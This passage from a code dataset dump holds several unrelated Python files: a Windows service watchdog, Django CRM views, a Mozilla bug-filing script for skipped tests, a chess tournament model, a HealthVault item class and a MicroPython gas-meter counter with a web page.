\n \n \n \"\"\"\n\n # Turn these into plain/html MIMEText objects\n part1 = MIMEText(text, \"plain\")\n part2 = MIMEText(html, \"html\")\n\n # Add HTML/plain-text parts to MIMEMultipart message\n # The email client will try to render the last part first\n message.attach(part1)\n message.attach(part2)\n\n # Create a secure SSL context\n context = ssl.create_default_context()\n\n try:\n server = smtplib.SMTP(smtp_server,port)\n server.ehlo() # Can be omitted\n server.starttls(context=context) # Secure the connection\n server.ehlo() # Can be omitted\n server.login(sender_email, password)\n server.sendmail(sender_email, recipiants, message.as_string().format(exo_server=exo_server))\n logging.info('Sent e-mails responsible staff.')\n except Exception as e:\n # Print any error messages to stdout\n logging.info('Failed to send e-mails.')\n print(e)\n finally:\n server.quit() \n\n\ndef get_task_status(task_name):\n tasks = subprocess.check_output(f'tasklist /v /fi \"IMAGENAME eq {task_name}\"').decode('cp866', 'ignore').split(\"\\r\\n\")\n\n for task in tasks:\n if task_name in task:\n return False if 'Not Responding' in task else True\n \n return 0\n\n\ndef exo_handle(start=False):\n start_uri = env.path('EXO_START_URI')\n stop_uri = env.path('EXO_STOP_URI')\n\n name = 'Eo4Run' if start else 'EXOstop'\n uri = start_uri if start else stop_uri\n\n try:\n status = subprocess.Popen(uri)\n logging.info(f'Succesfully ran {name}.')\n return status\n except:\n logging.info(f'{name} failed to run.')\n return 0\n\n\nif __name__ == '__main__':\n logging.info('-----------------------------------------------------')\n logging.info('Checking for hung processes..')\n task_name = env.str('EXO_TASK_NAME')\n task = get_task_status(task_name)\n\n if task == 0:\n logging.info(f'Failed to find any running {task_name}.')\n elif task and debug == 0:\n logging.info(f'Task {task_name} is Running or Unknown, no action required.')\n else:\n logging.info(f'{task_name} is Not Responding, restarting services.')\n \n retry = 1\n # Trying to run Exostop 5 times before exiting script \n while retry <= 5:\n logging.info(f'Running EXOstop, try {retry} of 5.')\n stop_status = exo_handle()\n if stop_status == 0:\n retry += 1\n else:\n break\n \n # Trying to run Eo4Run if EXOstop was successful and Exo is not still running.\n if stop_status != 0:\n retry = 1\n while retry <= 5:\n time.sleep(10)\n logging.info(f'Starting service {task_name}, try {retry} of 5.')\n start_status = get_task_status(task_name)\n if start_status == 0:\n task = exo_handle(True)\n if task != 0:\n if debug == 0:\n mail_to()\n break\n else:\n retry += 1\n else:\n retry += 1\n else:\n logging.info(f'Failed to stop EXO service, closing down.')","repo_name":"VamasAB/script-exo-alive","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"23923256675","text":"from django.http import HttpResponse\n# Create your views here.\nfrom django.shortcuts import render, redirect\nfrom .models import Client\nfrom commande.filtre import CommandeFiltre\nfrom client.form import ClientForm\nfrom django.contrib.auth.decorators import login_required\n\n@login_required(login_url='acces')\ndef list_client(request, pk):\n client = Client.objects.get(id=pk)\n commandes = client.commande_set.all()\n commandes_total = commandes.count()\n myFilter = CommandeFiltre(request.GET, queryset=commandes)\n commandes = myFilter.qs\n context = {'client' : 
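# The __main__ block above spells out the same "try up to 5 times" loop twice, once for
# EXOstop and once for the service restart. A small helper expressing that pattern once
# (a sketch, not part of the original script; 0 is kept as the failure sentinel it uses):
import time

def retry(action, attempts=5, delay=0):
    # Call action() until it returns something other than 0, or attempts run out.
    for _ in range(attempts):
        result = action()
        if result != 0:
            return result
        if delay:
            time.sleep(delay)
    return 0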
client,'commandes': commandes, 'commandes_total': commandes_total, 'myFilter': myFilter}\n return render(request, 'client/list_client.html', context)\n\n@login_required(login_url='acces')\ndef ajouter_client(request):\n form = ClientForm()\n if request.method == 'POST':\n form = ClientForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/acceuil')\n context = {'form':form}\n return render(request, 'client/ajouter_client.html', context)\n\n\n@login_required(login_url='acces')\ndef modifier_client(request, pk):\n client = Client.objects.get(id=pk)\n form = ClientForm(instance=client)\n if request.method == 'POST':\n form = ClientForm(request.POST,instance=client)\n if form.is_valid():\n form.save()\n return redirect('/client' + '/' + pk)\n context = {'form':form}\n return render(request, 'client/ajouter_client.html', context)\n\n\n@login_required(login_url='acces')\ndef supprimer_client(request, pk):\n client = Client.objects.get(id=pk)\n if request.method == 'POST':\n client.delete()\n return redirect('/acceuil')\n context = {'client': client}\n return render(request,'client/supprimer_client.html', context)\n\n","repo_name":"moatazkrimchi/App-CRM-Django","sub_path":"client/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"28272402994","text":"\"\"\"\nThis script automates the process of filing bugs for tests skipped due to new\nor migrating platforms.\n\nIt requires a bit of setup to use:\n\n1. Ensure you can login via the bugzilla client. First add:\n\n [DEFAULT]\n url = https://bugzilla.mozilla.org\n\nto ~/.config/python-bugzilla/bugzillarc. Next generate a new API key from\nyour Bugzilla profile and paste it into the prompt you get from:\n\n $ bugzilla login --api-key`.\n\nIf you'd like to test the tool out, use `https://bugzilla.allizom.org` as the\nurl instead and request a test account from #bmo in slack.\n\n2. Set the `GECKO` environment variable to your mozilla-central clone.\n\n3. Craft the patch that disables tests. You can optionally use `{{bug}}` as a\nplaceholder for the bug id, or {{reason}} as a placeholder for the reason string.\nE.g:\n\n skip-if =\n os == \"linux\" && debug # {{bug}} - {{reason}}\n\n\n4. Export the patch to a file:\n\n $ hg export . > orig.patch\n\n5. Run the tool. You'll need to supply the patch file, a reason string and an\noptional try url. Also consider redirecting the output to a new file:\n\n $ ./test-triage-bug-filer path/to/orig.patch \"new platform triage for foo\" --try-url > new.patch\n\n6. 
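# The Django views above redirect to routes such as /client/<pk> and rely on a named URL
# 'acces'. A hypothetical urls.py sketch showing how they could be wired up (the route
# names and patterns here are assumptions, not taken from the repository):
from django.urls import path
from client import views

urlpatterns = [
    path('client/<str:pk>/', views.list_client, name='list_client'),
    path('client/ajouter/', views.ajouter_client, name='ajouter_client'),
    path('client/modifier/<str:pk>/', views.modifier_client, name='modifier_client'),
    path('client/supprimer/<str:pk>/', views.supprimer_client, name='supprimer_client'),
]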
Import the new patch and prune the old one:\n\n $ hg import new.patch\n $ hg prune -r \n\"\"\" # noqa: E501\n\n\nimport json\nimport os\nimport subprocess\nimport sys\nimport traceback\nfrom itertools import chain\n\nimport bugzilla\nfrom unidiff import PatchSet\n\nbzapi = bugzilla.Bugzilla(\"https://bugzilla.mozilla.org\")\n\nBUG_SUMMARY_TEMPLATE = \"Tests skipped in '{path}' for {reason}\"\nBUG_DESCRIPTION_TEMPLATE = \"\"\"\nNote: This bug was filed automatically [via script](https://hg.mozilla.org/build/braindump/file/tip/test-related/test-triage-bug-filer).\n\nThe following tests are being disabled in [{path}](https://searchfox.org/mozilla-central/source/{path}) due to {reason}:\n{skipped_tests}\n\nFull diff:\n```diff\n{diff}\n```\n{try_blurb}\n### Disclaimer\nAdding new platforms is not an exact science, and in order to get to green and\nenable coverage ASAP, we often err on the side of disabling when in doubt. For\nthis reason, it's possible that the annotation was added in error, is covered\nby an existing intermittent, or was fixed sometime between now and when the\nannotation was made.\n\nIf you believe this is the case here, please feel free to remove the\nannotation. Sorry for the inconvenience and thanks for understanding.\n\"\"\".lstrip() # noqa: E501\n\nTRY_BLURB_TEMPLATE = \"\"\"\n{try_url}\nTo run these failures in your own try push, first ensure the patches from bug {bug_id}\nhave landed, revert the `skip-if` annotations, then run:\n```bash\n$ ./mach try fuzzy --rebuild 3 {path}\n```\n\nFinally use the [fuzzy interface](https://firefox-source-docs.mozilla.org/tools/try/selectors/fuzzy.html) to select the task(s) which are relevant to the\n`skip-if` expression(s).\n\"\"\" # noqa: E501\n\nTRY_URL_TEMPLATE = \"\"\"\nSee this [try push]({try_url}) for failures. 
If failures are missing, they were\neither discovered on a subsequent try push or this bug is invalid.\n\"\"\"\n\n\ndef get_bug_components(paths):\n proc = subprocess.run(\n [\"mach\", \"file-info\", \"bugzilla-component\", \"--format=json\"] + paths,\n capture_output=True,\n text=True,\n check=True,\n cwd=os.environ[\"GECKO\"],\n )\n return json.loads(proc.stdout)\n\n\ndef get_skipped_tests(manifest):\n skipped_tests = set()\n for hunk in manifest:\n last_test = \"unknown\"\n last_key = None\n for line in hunk:\n if line.value.startswith(\"[\"):\n last_test = line.value.strip().strip(\"[]\")\n elif not line.value.startswith(\" \") and \"=\" in line.value:\n last_key = line.value[: line.value.index(\"=\")].strip()\n\n if not line.is_added or \"{bug}\" not in line.value:\n continue\n\n if last_key == \"skip-if\":\n skipped_tests.add(last_test)\n return skipped_tests\n\n\ndef create_bug(\n product,\n component,\n summary,\n description,\n depends_on,\n bugtype=\"task\",\n version=\"unspecified\",\n dry_run=False,\n **kwargs,\n):\n if dry_run:\n description = \" \" + \"\\n \".join(description.splitlines())\n print(\n f\"\"\"\nThe following bug would be filed:\n {summary}\n Product: {product}\n Component: {component}\n Depends on: {depends_on}\n Description:\n {description}\n\"\"\"\n )\n return\n\n createinfo = bzapi.build_createbug(\n product=product,\n component=component,\n summary=summary,\n description=description,\n version=version,\n depends_on=depends_on,\n )\n createinfo[\"type\"] = bugtype\n createinfo.update(kwargs)\n try:\n bug = bzapi.createbug(createinfo)\n print(bug.weburl, file=sys.stderr)\n return bug.id\n except Exception:\n print(\"Failed to create bug:\", file=sys.stderr)\n print(traceback.format_exc(), file=sys.stderr)\n\n\ndef process_diff(\n diff: str, reason: str, depends_on: str, try_url: str = \"\", dry_run: bool = False\n):\n if not bzapi.logged_in:\n bzapi.interactive_login()\n\n try_url = try_url or \"\"\n\n patch = PatchSet.from_filename(diff, encoding=\"utf-8\")\n components = get_bug_components([m.path for m in patch])\n\n for manifest in patch:\n if (\n not manifest.path.endswith(\".ini\")\n or \"testing/web-platform\" in manifest.path\n ):\n continue\n\n skipped_tests = get_skipped_tests(manifest)\n if not skipped_tests:\n continue\n\n product, component = components[manifest.path]\n summary = BUG_SUMMARY_TEMPLATE.format(path=manifest.path, reason=reason)\n\n skipped_tests_str = \"* \" + \"\\n* \".join(skipped_tests)\n if try_url:\n url = TRY_URL_TEMPLATE.format(\n try_url=f\"{try_url}&test_paths={manifest.path}\"\n )\n try_blurb = TRY_BLURB_TEMPLATE.format(\n path=manifest.path, try_url=url, bug_id=depends_on\n )\n description = BUG_DESCRIPTION_TEMPLATE.format(\n path=manifest.path,\n reason=reason,\n skipped_tests=skipped_tests_str,\n diff=str(manifest),\n try_blurb=try_blurb,\n )\n bug_id = create_bug(\n product, component, summary, description, depends_on, dry_run=dry_run\n )\n if not bug_id:\n continue\n\n for line in chain.from_iterable([hunk for hunk in manifest]):\n if line.is_added:\n line.value = line.value.replace(\"{bug}\", f\"Bug {bug_id}\")\n line.value = line.value.replace(\"{reason}\", reason)\n\n if not dry_run:\n print(patch)\n","repo_name":"Remi288/mozci-tools","sub_path":"citools/test_triage_bug_filer.py","file_name":"test_triage_bug_filer.py","file_ext":"py","file_size_in_byte":6699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"98"} +{"seq_id":"15587976992","text":"import mvc_chess.models.turn as 
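# get_skipped_tests above walks a unidiff PatchSet hunk by hunk and line by line. The
# same traversal pattern, reduced to a self-contained sketch that counts added lines
# per patched file:
from unidiff import PatchSet

def added_lines_per_file(diff_path):
    # Map each file in the patch to the number of lines the diff adds to it.
    patch = PatchSet.from_filename(diff_path, encoding="utf-8")
    return {
        patched_file.path: sum(line.is_added for hunk in patched_file for line in hunk)
        for patched_file in patch
    }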
turn\nfrom mvc_chess.models.turn import Turn\n\n\nclass Tournament:\n states = {\n \"NOT_STARTED\": \"Not started\",\n \"IN_PROGRESS\": \"In progress\",\n \"FINISHED\": \"Finished\"\n }\n time_controls = [\n \"Bullet\",\n \"Blitz\",\n \"Rapid\"\n ]\n number_players = 8\n\n def __init__(self, id,\n name, location, date,\n time_control, description,\n number_turns=4\n ):\n self.id = id\n self.name = name\n self.location = location\n self.date = date\n self.players = []\n self.turns = []\n self.scores = []\n self._time_control = time_control\n self.description = description\n self.number_turns = number_turns\n self.pairs_already_played = []\n\n @property\n def time_control(self):\n return self._time_control\n\n @time_control.setter\n def time_control(self, value):\n if value in Tournament.time_controls:\n self.time_control = value\n\n def add_player(self, new_player):\n self.players.append(new_player)\n\n def has_pairs_already_played(self, two_players):\n if two_players in self.pairs_already_played or\\\n two_players[::-1] in self.pairs_already_played:\n return True\n return False\n\n def refresh_pairs_already_played(self):\n all_matchs = [match\n for turn in self.turns\n for match in turn.matchs]\n for match in all_matchs:\n pair = match.get_players()\n if pair not in self.pairs_already_played:\n self.pairs_already_played.append(pair)\n\n def generate_pairs(self):\n # Premier tour\n if len(self.turns) == 1:\n sorted_players = sorted(self.players, key=lambda j: j.rank, reverse=True)\n pairs = zip(\n sorted_players[:int(Tournament.number_players / 2)],\n sorted_players[int(Tournament.number_players / 2):]\n )\n pairs = list(pairs)\n else: # Tours suivants\n # On tri les players selon leur score/rank\n mixed_players = []\n for player in self.players:\n mixed_players.append((player, self.get_player_score(player), player.rank))\n\n sorted_players_score = sorted(mixed_players, key=lambda elm: (elm[1], elm[2]), reverse=True)\n sorted_players = [elm[0] for elm in sorted_players_score]\n\n # On aparie les joueurs dans l'ordre des scores/rank en décalant si le match a déjà eu lieu\n pairs = []\n while sorted_players:\n current_player = sorted_players.pop(0)\n for potential_player in sorted_players:\n potential_pair = [current_player, potential_player]\n if not self.has_pairs_already_played(potential_pair):\n pair = potential_pair\n sorted_players.remove(potential_player)\n break\n else:\n pair = [current_player, sorted_players[0]]\n sorted_players.pop(0)\n\n pairs.append(pair)\n\n self.pairs_already_played.extend(pairs)\n return pairs\n\n def begin_next_turn(self):\n new_turn = turn.Turn(f\"Round {len(self.turns) + 1}\")\n self.turns.append(new_turn)\n\n pairs = self.generate_pairs()\n new_turn.create_matches(pairs)\n\n def end_current_turn(self):\n self.update_scores()\n self.turns[-1].mark_as_complete()\n\n def get_current_turn(self):\n return self.get_turns()[-1] if self.get_turns() else None\n\n def update_scores(self):\n self.scores = []\n all_matchs = [match\n for turn in self.turns\n for match in turn.matchs]\n\n for player in self.players:\n player_score = 0\n for match in all_matchs:\n if player is match.get_first_player():\n player_score += match.get_score_first_player()\n elif player is match.get_second_player():\n player_score += match.get_score_second_player()\n self.scores.append({\n \"player_id\": player.id,\n \"player_score\": player_score,\n })\n\n def get_player_score(self, player):\n player_score = [score for score in self.scores if score[\"player_id\"] == player.id]\n return 
player_score[0][\"player_score\"] if player_score else 0\n\n def get_players_by_name(self):\n return sorted(self.players, key=lambda p: p.nom)\n\n def get_players_by_rank(self):\n return sorted(self.players, key=lambda p: p.rank)\n\n def get_turns(self):\n return self.turns\n\n def get_matchs(self):\n return [match\n for turn in self.turns\n for match in turn.matchs\n ]\n\n def state(self):\n if not self.turns:\n state = Tournament.states[\"NOT_STARTED\"]\n elif len(self.turns) == self.number_turns and\\\n self.turns[-1].is_finish():\n state = Tournament.states[\"FINISHED\"]\n else:\n state = Tournament.states[\"IN_PROGRESS\"]\n\n return state\n\n def set_id(self, new_id):\n try:\n self.id = int(new_id)\n except ValueError as error:\n raise ValueError(error)\n\n def serialize(self):\n serialized_tournament = {\n \"id\": self.id,\n \"name\": self.name,\n \"location\": self.location,\n \"date\": self.date,\n \"players\": [\n player.id for player in self.players\n ],\n \"turns\": [\n turn.serialize() for turn in self.turns\n ],\n \"time_control\": self.time_control,\n \"description\": self.description,\n \"number_turns\": self.number_turns,\n }\n\n return serialized_tournament\n\n @classmethod\n def deserialize(cls, serialized_tournament, players):\n tournament = Tournament(\n serialized_tournament[\"id\"],\n serialized_tournament[\"name\"],\n serialized_tournament[\"location\"],\n serialized_tournament[\"date\"],\n serialized_tournament[\"time_control\"],\n serialized_tournament[\"description\"],\n serialized_tournament[\"number_turns\"]\n )\n\n for player_id in serialized_tournament[\"players\"]:\n player = next(player for player in players if player.id == player_id)\n tournament.add_player(player)\n\n for serialized_turn in serialized_tournament[\"turns\"]:\n deserialized_turn = Turn.deserialize(serialized_turn, players)\n tournament.turns.append(deserialized_turn)\n\n tournament.update_scores()\n tournament.refresh_pairs_already_played()\n return tournament\n\n @classmethod\n def is_valid(cls, name, location, date,\n time_control, description):\n if not name or not location or not date:\n return False\n if time_control not in Tournament.time_controls:\n return False\n return True\n\n def __repr__(self):\n repr = f\"{self.name} - {self.location} - {self.date} - state : {self.state()} \\n\"\n repr += f\"players : {len(self.players)}/{Tournament.number_players}\\n\"\n sorted_players = sorted(self.players, key=lambda p: [self.get_player_score(p), p.rank], reverse=True)\n for player in sorted_players:\n repr += f\"\\t{player.lastname}\\t{player.firstname}\\t{player.rank}\\t{self.get_player_score(player)}\\n\"\n\n repr += \"\\n\"\n for tournament_turn in self.turns:\n repr += f\"{tournament_turn} \\n\"\n\n return repr\n","repo_name":"arnadu89/projet4","sub_path":"mvc_chess/models/tournament.py","file_name":"tournament.py","file_ext":"py","file_size_in_byte":7810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"3898046682","text":"from lxml import etree\n\nfrom healthvaultlib.utils.xmlutils import XmlUtils\nfrom healthvaultlib.itemtypes.healthrecorditem import HealthRecordItem\n\n\nclass Message(HealthRecordItem):\n\n def __init__(self, thing_xml=None):\n super(Message, self).__init__()\n self.type_id = '72dc49e1-1486-4634-b651-ef560ed051e5'\n if thing_xml is not None:\n self.thing_xml = thing_xml\n self.parse_thing()\n\n def __str__(self):\n return 'Message'\n\n def parse_thing(self):\n super(Message, self).parse_thing()\n xmlutils = 
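# generate_pairs above seeds the first round by sorting the field on rank and zipping the
# top half against the bottom half. The same idea with plain (name, rank) tuples standing
# in for Player objects (sample data, not from the models):
players = [("p1", 12), ("p2", 5), ("p3", 9), ("p4", 1), ("p5", 7), ("p6", 3), ("p7", 11), ("p8", 2)]

sorted_players = sorted(players, key=lambda p: p[1], reverse=True)
half = len(sorted_players) // 2
pairs = list(zip(sorted_players[:half], sorted_players[half:]))
# The top seed meets the strongest player of the lower half, and so on down the list.
print(pairs)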
XmlUtils(self.thing_xml)\n\n def write_xml(self):\n thing = super(Message, self).write_xml()\n data_xml = etree.Element('data-xml')\n message = etree.Element('message')\n\n data_xml.append(message)\n thing.append(data_xml)\n return thing\n","repo_name":"rajeevs1992/pyhealthvault","sub_path":"src/healthvaultlib/itemtypes/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"13597312456","text":"# -*- coding: ascii -*-\n\"\"\"\n# main.py\nThis is main code part.\n\nGas script\n\n\n# import time\n# no imports needed here, all taken from boot.py\n\"\"\"\n__version__ = 'v17_02'\n\nVGLOB = {}\n\n#-### TODO move this to boot\ninput1 = machine.ADC(machine.Pin(32))\ninput1.atten(machine.ADC.ATTN_11DB)\ninput1.width(machine.ADC.WIDTH_11BIT)\n#\ntimer_check = machine.Timer(0)\n\n#-### definition of functions\n\n#-###\n#-###\n#-### time zone definitions\n\n# from https://stackoverflow.com/questions/63271522/is-there-a-zfill-type-function-in-micro-python-zfill-in-micro-python\ndef zfl(s, width):\n# Pads the provided string with leading 0's to suit the specified 'chrs' length\n# Force # characters, fill with leading 0's\n return '{:0>{w}}'.format(s, w=width)\n\ndef localtime() -> str:\n # by JumpZero, https://forum.micropython.org/viewtopic.php?t=4034#p23122\n year = time.localtime()[0] # get current year\n HHMarch = time.mktime((year, 3, (31 - (int(5 * year / 4 + 4)) % 7), 1, 0, 0, 0, 0, 0)) # Time of March change to CEST\n HHOctober = time.mktime((year, 10, (31 - (int(5 * year / 4 + 1)) % 7), 1, 0, 0, 0, 0, 0)) # Time of October change to CET\n now = time.time()\n if now < HHMarch: # we are before last sunday of march\n cet = time.gmtime(now + 3600) # CET: UTC+1H\n elif now < HHOctober: # we are before last sunday of october\n cet = time.gmtime(now + 7200) # CEST: UTC+2H\n else: # we are after last sunday of october\n cet = time.gmtime(now + 3600) # CET: UTC+1H\n return(cet)\n\n#-###\n#-###\n#-### time function\n\ndef now(ttt: str = \"a\") -> str:\n if ttt == \"m\":\n return \"{0:04d}-{1:02d}-{2:02d}\".format(*localtime()) + \" {3:02d}:{4:02d}\".format(*localtime())\n if ttt == \"h\":\n return \"{0:04d}-{1:02d}-{2:02d}\".format(*localtime()) + \" {3:02d}\".format(*localtime())\n if ttt == \"d\":\n return \"{0:04d}-{1:02d}-{2:02d}\".format(*localtime())\n else:\n return \"{0:04d}-{1:02d}-{2:02d}\".format(*localtime()) + \" {3:02d}:{4:02d}:{5:02d}\".format(*localtime())\n\ndef frecalibrate() -> None:\n ### reset limits and extremes, recalibration of the sensor\n #VGLOB['limit'][0] = 0\n #VGLOB['limit'][1] = VGLOB['temp']\n #OFFSET['extremes'][0] = OFFSET['extremes'][1] = VGLOB['temp'] \n # reset temp limit and extremes\n value = fread_single()\n VGLOB['limit'][0] = 0 # temp limit up or down\n VGLOB['limit'][1] = round(value*0.99) # temp limit value\n OFFSET['extremes'][0] = round(value*0.99)\n OFFSET['extremes'][1] = round(value*1.01)\n return\n\ndef frecount() -> None:\n VGLOB['counter'] = OFFSET['value'] + ( sum(countsn_h) * OFFSET['res'] )\n return\n\ndef freset() -> None:\n # function to cleanly reset, while saving all the files\n try:\n fsave_count()\n except:\n pass\n #\n try:\n fsave_offset()\n except:\n pass\n #fsave_extremes\n time.sleep(0.05)\n machine.reset()\n\ndef fsave_count() -> None:\n time.sleep(0.05)\n print('=== saving')\n bb = open('countsn_h.bin', 'wb')\n bb.write(countsn_h)\n bb.close()\n time.sleep(0.05)\n return\n\ndef fsave_offset() -> None:\n # 
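# write_xml above assembles the thing's payload with lxml elements; serializing the tree
# for inspection is one more call. A minimal sketch using only the element names from the
# class:
from lxml import etree

data_xml = etree.Element('data-xml')
data_xml.append(etree.Element('message'))
print(etree.tostring(data_xml, pretty_print=True).decode())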
save offset file\n time.sleep(0.05)\n print('=== saving offset')\n dd = open('offset.py', 'w')\n dd.write( 'OFFSET = ' + str(OFFSET) )\n dd.close()\n time.sleep(0.05)\n return\n\n#-###\n#-###\n#-### callback, from the reed sensor\n\ndef fread_single(counts: int = 20) -> int:\n # this function reads single value\n # cleans the spikes, and cleans the output\n # it is a separa\n global VGLOB\n time_seconds = 0.5\n def single_read(countsin):\n time.sleep( round(time_seconds / countsin,3) )\n return( input1.read() )\n value_list = sorted([single_read(counts) for aaa in range(counts)])[round(counts*0.6):round(counts*0.8)]\n value_avg = sum( value_list ) / round(counts*0.2)\n value_stdev = sum( [abs(iii-value_avg) for iii in value_list] ) / round(counts*0.2)\n #print( value_stdev, value_list )\n #time.sleep(1)\n if value_stdev < 1: # was 1.5, but maybe more strict is better\n VGLOB['temp'] = round( value_avg, 1 )\n return round( VGLOB['temp'] ) \n\n\n#-###\ndef finput_read(var = None) -> None:\n # this function reads the cleaned input\n # sets extremes (calibration of readout) and triggers counting\n #\n global VGLOB\n global OFFSET\n #\n runavgires = fread_single()\n #print( runavgires )\n # \n # v17_01 the extremes where 10%, now changed to 1% difference\n OFFSET['extremes'][0] = min( OFFSET['extremes'][0], round(runavgires*1.01) )\n OFFSET['extremes'][1] = max( OFFSET['extremes'][1], round(runavgires*0.99) )\n diff = round( ( OFFSET['extremes'][1] - OFFSET['extremes'][0] ) * (2/3) )\n #\n # search max\n if VGLOB['limit'][0] == 1 and runavgires > VGLOB['limit'][1]:\n VGLOB['limit'][1] = runavgires\n # search min\n if VGLOB['limit'][0] == 0 and runavgires < VGLOB['limit'][1]:\n VGLOB['limit'][1] = runavgires\n # count drop\n if VGLOB['limit'][0] == 1 and runavgires < VGLOB['limit'][1] - diff:\n #print('count drop')\n VGLOB['limit'] = [ 0, runavgires ]\n #VGLOB['value'] = VGLOB['value'] + 0.05\n # trigger button\n fcb_btn()\n # count jump\n if VGLOB['limit'][0] == 0 and runavgires > VGLOB['limit'][1] + diff:\n #print('count jump')\n VGLOB['limit'] = [ 1, runavgires ]\n #VGLOB['value'] = VGLOB['value'] + 0.05\n # trigger button\n fcb_btn()\n #print('hall_ext', VGLOB['extremes'], runavgires, VGLOB['limit'])\n return\n\n#-###\n#-###\n#-###\n\ndef fcb_btn(var = None) -> None:\n #print('++ counter')\n #time.sleep(4)\n # get globals\n global countsn_h\n global countsn_d\n #global VGLOB['counter']\n #global inpvv\n global VGLOB\n #global vwebpage\n # define new objects in table\n diffh = int((time.time() - VGLOB['offset_time']) / (3600)) + 1\n while len(countsn_h) < diffh: # here was +1\n countsn_h.append(0)\n #\n diffd = int((time.time() - VGLOB['offset_time']) / (24 * 3600)) + 1\n while len(countsn_d) < diffd: # here was +1\n countsn_d.append(0)\n # if callback triggered\n #if True:\n # set update timer\n VGLOB['update'] = now()\n # last position is current\n # this is the place where things are counted\n countsn_h[-1] += 1\n countsn_d[-1] += 1\n #\n #recalculate\n frecount()\n #VGLOB['counter'] = OFFSET['value'] + ( sum(countsn_h) * OFFSET['res'] )\n #\n print('+++ counted !')\n #\n fsave_count()\n #\n gc.collect()\n return\n\n#-###\n#-###\n#-### send file\n\ndef fsendfile(writer, name) -> None:\n ###\n print('fsendfile')\n names = name.split(\".\")\n # print( names )\n if names[-1] == \"txt\":\n header = \"\"\"HTTP/1.1 200 OK\nCache-Control: max-age=600\nContent-Type: text/plain\n\"\"\"\n readtype = \"r\"\n elif names[-1] == \"gz\" and names[-2] == \"js\":\n header = \"\"\"HTTP/1.1 200 
OK\nContent-Encoding: gzip\nExpires: Sat, 17 Aug 2030 17:17:17 GMT\nCache-Control: public\nContent-Type: text/javascript\n\"\"\"\n readtype = \"rb\"\n elif names[-1] == \"gz\" and names[-2] == \"css\":\n #Age: 100\n #Expires: Sat, 17 Aug 2030 17:17:17 GMT\n #Cache-Control: max-age=86400\n header = \"\"\"HTTP/1.1 200 OK\nContent-Encoding: gzip\nExpires: Sat, 17 Aug 2030 17:17:17 GMT\nCache-Control: public\nContent-Type: text/css\n\"\"\"\n readtype = \"rb\"\n #\n aa = open(name, readtype)\n webpagelen = aa.seek(0, 2)\n aa.seek(0)\n header += \"\"\"Content-Length: \"\"\" + str(webpagelen) + \"\"\"\nConnection: close\n\"\"\"\n await writer.awrite(header + \"\\r\\n\")\n #\n #\n while aa.tell() < webpagelen:\n await writer.awrite( aa.read(12000) )\n #conn.send(aa.read(12000))\n #\n aa.close()\n # del aa\n print('fsendfile done')\n gc.collect()\n return\n\n#-###\n#-###\n#-### send data from memory\n\ndef fsenddata(writer, name, delta: int) -> None:\n # no close in header, as unknown lenght\n header = \"\"\"HTTP/1.1 200 OK\nContent-Type: text/plain\nTransfer-Encoding: chunked\nConnection: close\n\"\"\"\n # Connection: close\n #conn.send(header + \"\\r\\n\")\n await writer.awrite(header + \"\\r\\n\")\n # select so, that one complete chunk is not more than 10k\n chunklen = 200\n iii = 0\n # name = str( name )\n while iii < len(name):\n chunk = []\n chunksend = ''\n if iii + chunklen < len(name):\n chunk = name[iii:iii + chunklen]\n else:\n chunk = name[iii:len(name)]\n # create data\n for jjj in range(len(chunk)):\n # offset_time\n chunksend += str( iii + jjj ) + \" - \" + str( int( chunk[jjj] ) ) + \"\\r\\n\"\n #chunksend += str(iii + jjj) + \"; \" + str(OFFSET['date'] + ((iii + jjj) * delta)) + \"; \" + str(time.gmtime(OFFSET['date'] + ((iii + jjj) * delta))[0:4]) + \"; \" + str(int(chunk[jjj])) + \"; \" + str(int(chunk[jjj]) * OFFSET['res']) + \"\\r\\n\"\n #chunksend += str(iii + jjj) + \"; \" + str(OFFSET['date'] + ((iii + jjj) * delta)) + \"; \" + str(time.gmtime(OFFSET['date'] + ((iii + jjj) * delta))[0:4]) + \"; \" + str(int(chunk[jjj])) + \"; \" + str(int(chunk[jjj]) * OFFSET['res']) + \"\\r\\n\"\n # send data\n # if len( chunksend ) > 0:\n #conn.send(str(hex(len(chunksend))[2:]) + \"\\r\\n\" + chunksend + \"\\r\\n\")\n await writer.awrite( str(hex(len(chunksend))[2:]) + \"\\r\\n\" + chunksend + \"\\r\\n\" )\n #\n # print( iii, chunk )\n iii += chunklen\n # close\n await writer.awrite( \"0\\r\\n\\r\\n\" )\n #conn.send(\"0\\r\\n\\r\\n\")\n # do not conn.close here, and no return\n gc.collect()\n return\n\n#-###\n#-###\n#-### webpage generating function\n\npage_meta = \"\"\"\n\n\"\"\"\n\ndef fwebpage() -> str:\n global countsn_h\n global countsn_d\n # define new objects in table\n now = time.time()\n diffh = int((now - VGLOB['offset_time']) / (3600)) + 1\n while len(countsn_h) < diffh: # here was +1\n countsn_h.append(0)\n #\n diffd = int((now - VGLOB['offset_time']) / (24 * 3600)) + 1\n while len(countsn_d) < diffd: # here was +1\n countsn_d.append(0)\n # create chart, from last 48h\n #countsn_ha = list(reversed(list(countsn_h)[-48:])) # first cut, than convert to list\n countsn_ha = list(reversed(list(countsn_h[-48:])))\n # countsn_ha.reverse() # reverse short table for speed\n # chart\n # v17_02 hourly graph description\n # hour from last change VGLOB['update'], localtime()[3]\n chart_inx = str( [ ( ( ooo + localtime()[3] ) %24 ) for ooo in range( len( countsn_ha ),0,-1 ) ] )\n #chart_inx = str(list(range(1, len(countsn_ha) + 1)))\n chart_iny = str( [ x * OFFSET['res'] for x in countsn_ha ] 
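# fsenddata above hand-rolls HTTP/1.1 chunked transfer encoding: each chunk is framed as
# its payload length in hex, CRLF, the payload, CRLF, and a zero-length chunk ends the
# body. The framing on its own (a sketch):
def chunk_frame(payload: bytes) -> bytes:
    # One chunk: hex size, CRLF, data, CRLF.
    return b"%x\r\n" % len(payload) + payload + b"\r\n"

def chunk_end() -> bytes:
    # The terminating zero-length chunk.
    return b"0\r\n\r\n"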
